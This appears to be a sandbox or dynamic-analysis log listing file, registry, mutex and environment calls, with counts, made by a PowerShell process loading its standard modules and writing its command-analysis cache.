| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096 |
|
4 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 3546 |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 4096, size_out = 1528 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 520, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 1509 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 539, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 688, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| File | Create | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 664 |
|
1 | |
| File | Read | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 0 |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 43, size_out = 43 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 9, size_out = 9 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 11, size_out = 11 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 3483 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18, size = 1187 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096 |
|
4 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 3546 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 43, size_out = 43 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 9, size_out = 9 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 11, size_out = 11 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 3483 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 43, size_out = 43 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 9, size_out = 9 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 11, size_out = 11 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 3483 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 4096 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733, size = 2823 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096 |
|
4 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 3546 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 43, size_out = 43 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 9, size_out = 9 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 11, size_out = 11 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 3483 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
